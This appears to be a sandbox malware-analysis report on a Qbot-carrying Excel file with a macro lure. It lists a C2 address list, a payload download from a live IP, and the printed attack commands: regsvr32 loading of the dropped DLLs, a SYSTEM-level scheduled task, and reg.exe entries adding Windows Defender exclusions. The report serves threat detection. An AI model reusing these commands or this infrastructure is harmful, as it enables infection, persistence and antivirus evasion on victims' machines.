Windows Analysis Report Rebate-690835286-10052021.xls

Overview

General Information

Sample Name: Rebate-690835286-10052021.xls
Analysis ID: 497532
MD5: 1513c88677fc7fa1994a59197ebdb528
SHA1: b4b9486e65b90c10c2e0bd1c3617771ccec0a335
SHA256: 7eaf061ea660be58767918cb80fb98da9c348be2b2449836bf840cfbf12882ec
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Qbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected Qbot
Document exploit detected (drops PE files)
Sigma detected: Schedule system process
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Antivirus detection for URL or domain
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Office process drops PE file
Writes to foreign memory regions
Uses cmd line tools excessively to alter registry or file data
Sigma detected: Microsoft Office Product Spawning Windows Shell
Allocates memory in foreign processes
Injects code into the Windows Explorer (explorer.exe)
Sigma detected: Regsvr32 Command Line Without DLL
Drops PE files to the user root directory
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected hidden Macro 4.0 in Excel
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Downloads executable code via HTTP
Abnormal high CPU Usage
Drops files with a non-matching file extension (content does not match file extension)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Uses reg.exe to modify the Windows registry
Document contains embedded VBA macros
Drops PE files to the user directory
PE file overlay found
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

barindex
Found malware configuration
Source: 9.2.explorer.exe.e0000.0.unpack Malware Configuration Extractor: Qbot {"Bot id": "obama109", "Campaign": "1633422349", "Version": "402.363", "C2 list": ["202.134.178.157:443", "187.116.124.82:995", "73.130.180.25:443", "73.52.50.32:443", "120.151.47.189:443", "181.118.183.94:443", "122.11.220.212:2222", "103.142.10.177:443", "202.165.32.158:2222", "70.37.217.196:443", "78.191.36.142:995", "167.248.100.227:443", "103.148.120.144:443", "89.101.97.139:443", "75.75.179.226:443", "120.150.218.241:995", "185.250.148.74:443", "72.196.22.184:0", "81.241.252.59:2078", "140.82.49.12:443", "136.232.34.70:443", "39.52.197.237:995", "167.248.117.81:443", "81.250.153.227:2222", "69.30.186.190:443", "73.230.205.91:443", "89.137.52.44:443", "74.72.237.54:443", "96.57.188.174:2078", "37.210.152.224:995", "94.200.181.154:443", "217.17.56.163:2222", "217.17.56.163:2078", "41.228.22.180:443", "115.96.53.68:443", "124.123.42.115:2222", "38.10.197.234:443", "75.66.88.33:443", "173.21.10.71:2222", "73.151.236.31:443", "202.165.32.158:2222", "47.22.148.6:443", "173.25.162.221:443", "71.74.12.34:443", "75.188.35.168:443", "206.47.134.234:2222", "216.201.162.158:443", "67.165.206.193:993", "45.46.53.140:2222", "76.25.142.196:443", "167.248.23.224:443", "47.40.196.233:2222", "177.94.21.110:995", "208.89.170.179:443", "167.248.54.34:2222", "86.8.177.143:443", "181.4.53.6:465", "167.248.99.149:443", "201.93.111.2:995", "24.55.112.61:443", "73.77.87.137:443", "109.12.111.14:443", "181.4.53.6:443", "40.131.140.155:995", "190.198.206.189:2222", "167.248.111.245:443", "96.46.103.226:443", "73.25.124.140:2222", "24.152.219.253:995", "72.252.201.69:443", "68.186.192.69:443", "24.229.150.54:995", "173.25.166.81:443", "174.54.58.170:443", "103.246.130.114:1194", "103.246.130.35:21", "103.246.130.2:20", "103.246.130.122:20", "2.99.100.134:2222", "105.198.236.99:443", "103.157.122.198:995", "4.34.193.180:995", "24.119.214.7:443", "159.2.51.200:2222", "110.174.64.179:995", "187.101.25.96:32100", "174.54.193.186:443", "76.84.230.103:443", "174.59.35.191:443", "173.63.245.129:443", "24.139.72.117:443", "68.117.229.117:443", "75.163.81.130:995", "76.84.32.159:443", "147.92.51.49:443", "68.204.7.158:443", "76.84.226.17:443", "68.13.157.69:443", "167.248.126.223:443", "72.196.22.184:443", "98.22.92.139:995", "209.50.20.255:443", "97.98.130.50:443", "196.117.106.38:995", "77.57.204.78:443", "191.191.38.8:443", "176.251.215.116:443", "96.46.103.109:2222", "188.210.210.122:443", "37.117.191.19:2222", "188.210.210.122:443", "197.90.137.161:61201", "24.32.174.175:443", "76.84.225.21:443", "188.210.210.122:443", "78.145.153.73:995", "69.30.190.105:995", "167.248.81.60:443", "69.80.113.148:443", "217.17.56.163:443", "62.23.194.38:443", "62.23.194.41:995", "199.27.127.129:443", "189.210.115.207:443", "174.59.226.6:443", "73.130.237.36:443", "69.253.197.100:443", "174.59.242.9:443", "177.130.82.197:2222", "67.214.30.12:995", "174.59.120.69:443", "47.181.84.61:443", "73.130.239.166:443", "217.165.163.21:995", "93.8.66.216:443", "73.52.114.202:443", "186.18.205.199
Antivirus detection for URL or domain
Source: http://101.99.90.118/44474.9279916667.dat Avira URL Cloud: Label: phishing
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: c:\level\match\lift_Fit\set\Nation\Heat.pdb source: regsvr32.exe, 00000008.00000002.646420576.000000006CB42000.00000002.00020000.sdmp, explorer.exe, 00000009.00000003.646985681.0000000002760000.00000004.00000001.sdmp, regsvr32.exe, 0000000D.00000002.723731467.000000006CB42000.00000002.00020000.sdmp
Source: Binary string: amstream.pdb source: explorer.exe, 00000009.00000003.646641483.0000000002760000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000003.723947721.00000000015F0000.00000004.00000001.sdmp
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB0AEF6 FindFirstFileW,FindNextFileW, 8_2_6CB0AEF6
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_000EAEF6 FindFirstFileW,FindNextFileW, 9_2_000EAEF6
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_0008AEF6 FindFirstFileW,FindNextFileW, 14_2_0008AEF6

Software Vulnerabilities:

barindex
Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: 44474.9279916667[1].dat.0.dr Jump to dropped file
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA Jump to behavior
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 194.36.191.21:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 101.99.90.118:80

Networking:

barindex
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 05 Oct 2021 20:18:03 GMTContent-Type: application/octet-streamContent-Length: 1079808Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44474.9279916667.dat"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 da 21 b1 75 9e 40 df 26 9e 40 df 26 9e 40 df 26 2d dc 3e 26 a1 40 df 26 2d dc 3f 26 9f 40 df 26 2a dc 2d 26 95 40 df 26 2a dc 2d 26 86 40 df 26 9e 40 de 26 4c 40 df 26 2a dc 2f 26 97 40 df 26 2a dc 2c 26 99 40 df 26 2a dc 30 26 9f 40 df 26 2a dc 28 26 0c 40 df 26 2a dc 31 26 9f 40 df 26 2a dc 2e 26 9f 40 df 26 52 69 63 68 9e 40 df 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 19 cc 90 5d 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0c 0a 00 0e 04 00 00 12 9d 00 00 00 00 00 f1 54 00 00 00 10 00 00 00 20 04 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 a1 00 00 04 00 00 64 c3 10 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 4e 10 00 a8 00 00 00 48 4f 10 00 50 00 00 00 00 20 a1 00 58 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 a1 00 3c 1c 00 00 a0 3b 10 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 3b 10 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 04 00 5c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 de 0c 04 00 00 10 00 00 00 0e 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 4c 37 0c 00 00 20 04 00 00 38 0c 00 00 12 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 f8 b4 90 00 00 60 10 00 00 0c 00 00 00 4a 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 58 04 00 00 00 20 a1 00 00 06 00 00 00 56 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 3c 1c 00 00 00 30 a1 00 00 1e 00 00 00 5c 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /44474.9279916667.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 101.99.90.118Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 194.36.191.21
Source: unknown TCP traffic detected without corresponding DNS query: 194.36.191.21
Source: unknown TCP traffic detected without corresponding DNS query: 194.36.191.21
Source: unknown TCP traffic detected without corresponding DNS query: 194.36.191.21
Source: unknown TCP traffic detected without corresponding DNS query: 194.36.191.21
Source: unknown TCP traffic detected without corresponding DNS query: 194.36.191.21
Source: unknown TCP traffic detected without corresponding DNS query: 185.123.53.199
Source: unknown TCP traffic detected without corresponding DNS query: 185.123.53.199
Source: unknown TCP traffic detected without corresponding DNS query: 185.123.53.199
Source: unknown TCP traffic detected without corresponding DNS query: 185.123.53.199
Source: unknown TCP traffic detected without corresponding DNS query: 185.123.53.199
Source: unknown TCP traffic detected without corresponding DNS query: 185.123.53.199
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: regsvr32.exe, 00000008.00000002.645961508.0000000002620000.00000002.00020000.sdmp, explorer.exe, 00000009.00000002.906949180.0000000001F10000.00000002.00020000.sdmp, regsvr32.exe, 0000000D.00000002.723204215.0000000000DA0000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000002.906929427.0000000000F70000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000005.00000002.594742750.0000000001CB0000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.595494652.0000000001D40000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.646970896.0000000001D50000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.645612767.0000000002320000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.724170254.00000000008F0000.00000002.00020000.sdmp, regsvr32.exe, 0000000D.00000002.722812935.0000000000890000.00000002.00020000.sdmp, reg.exe, 0000000F.00000002.726341911.0000000000830000.00000002.00020000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: regsvr32.exe, 00000008.00000002.645961508.0000000002620000.00000002.00020000.sdmp, explorer.exe, 00000009.00000002.906949180.0000000001F10000.00000002.00020000.sdmp, regsvr32.exe, 0000000D.00000002.723204215.0000000000DA0000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000002.906929427.0000000000F70000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44474.9279916667[1].dat Jump to behavior
Source: global traffic HTTP traffic detected: GET /44474.9279916667.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 101.99.90.118Connection: Keep-Alive

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable editing" in the yellow bar 19 above. 20 21 example of notification 22 23 ( 0 Thlsfi|eor
Source: Screenshot number: 4 Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the 26 docume
Source: Document image extraction number: 0 Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 PROTECTEDWARNING This file o
Source: Document image extraction number: 0 Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
Source: Document image extraction number: 0 Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
Source: Document image extraction number: 1 Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 pRoTEcTmwARNNG Thisfileorigi
Source: Document image extraction number: 1 Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
Source: Document image extraction number: 1 Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44474.9279916667[1].dat Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Celod.wac2
Detected potential crypto function
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB15000 8_2_6CB15000
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB16EF0 8_2_6CB16EF0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB11790 8_2_6CB11790
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB1237E 8_2_6CB1237E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_000F5000 9_2_000F5000
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_000F6EF0 9_2_000F6EF0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_000F237E 9_2_000F237E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_000F1790 9_2_000F1790
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_00095000 14_2_00095000
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_00096EF0 14_2_00096EF0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_0009237E 14_2_0009237E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_00091790 14_2_00091790
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: Rebate-690835286-10052021.xls OLE, VBA macro line: Sub auto_close()
Source: Rebate-690835286-10052021.xls OLE, VBA macro line: Sub auto_open()
Source: Rebate-690835286-10052021.xls OLE, VBA macro line: Private Sub saWorkbook_Opensa()
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB0CBB9 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary, 8_2_6CB0CBB9
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB0C702 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose, 8_2_6CB0C702
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\regsvr32.exe Process Stats: CPU usage > 98%
PE file does not import any functions
Source: Celod.wac2.9.dr Static PE information: No import functions for PE file found
Source: Celod.wac2.14.dr Static PE information: No import functions for PE file found
Uses reg.exe to modify the Windows registry
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Jjyjdgvcvuvi' /d '0'
Document contains embedded VBA macros
Source: Rebate-690835286-10052021.xls OLE indicator, VBA macros: true
PE file overlay found
Source: Celod.wac2.14.dr Static PE information: Data appended to the last section found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: 44474.9279916667[1].dat.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Celod.wac2.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Celod.wac2.9.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\regsvr32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ....................<.............3.....(.P.............................O....................................................................... Jump to behavior
Source: C:\Windows\System32\reg.exe Console Write: ................................T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.........h.%.....N.......(............... Jump to behavior
Source: C:\Windows\System32\reg.exe Console Write: ................4...............T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.........x.......N.......(............... Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Celod.wac
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Celod.wac1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Celod.wac2
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Celod.wac2
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn tcrzbkfctd /tr 'regsvr32.exe -s \'C:\Users\user\Celod.wac2\'' /SC ONCE /Z /ST 22:20 /ET 22:32
Source: unknown Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Celod.wac2'
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Celod.wac2'
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Jjyjdgvcvuvi' /d '0'
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Uwwyocree' /d '0'
Source: unknown Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Celod.wac2'
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Celod.wac2'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Celod.wac Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Celod.wac1 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Celod.wac2 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Celod.wac2 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn tcrzbkfctd /tr 'regsvr32.exe -s \'C:\Users\user\Celod.wac2\'' /SC ONCE /Z /ST 22:20 /ET 22:32 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Celod.wac2' Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Jjyjdgvcvuvi' /d '0' Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Uwwyocree' /d '0' Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Celod.wac2' Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Application Data\Microsoft\Forms Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD538.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@25/6@0/3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB0D565 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket, 8_2_6CB0D565
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: Rebate-690835286-10052021.xls OLE indicator, Workbook stream: true
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB0ABE5 CreateToolhelp32Snapshot,memset,Process32First,Process32Next,CloseHandle, 8_2_6CB0ABE5
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\{CA527C6B-71D3-4220-8B46-2F1242F5F8B8}
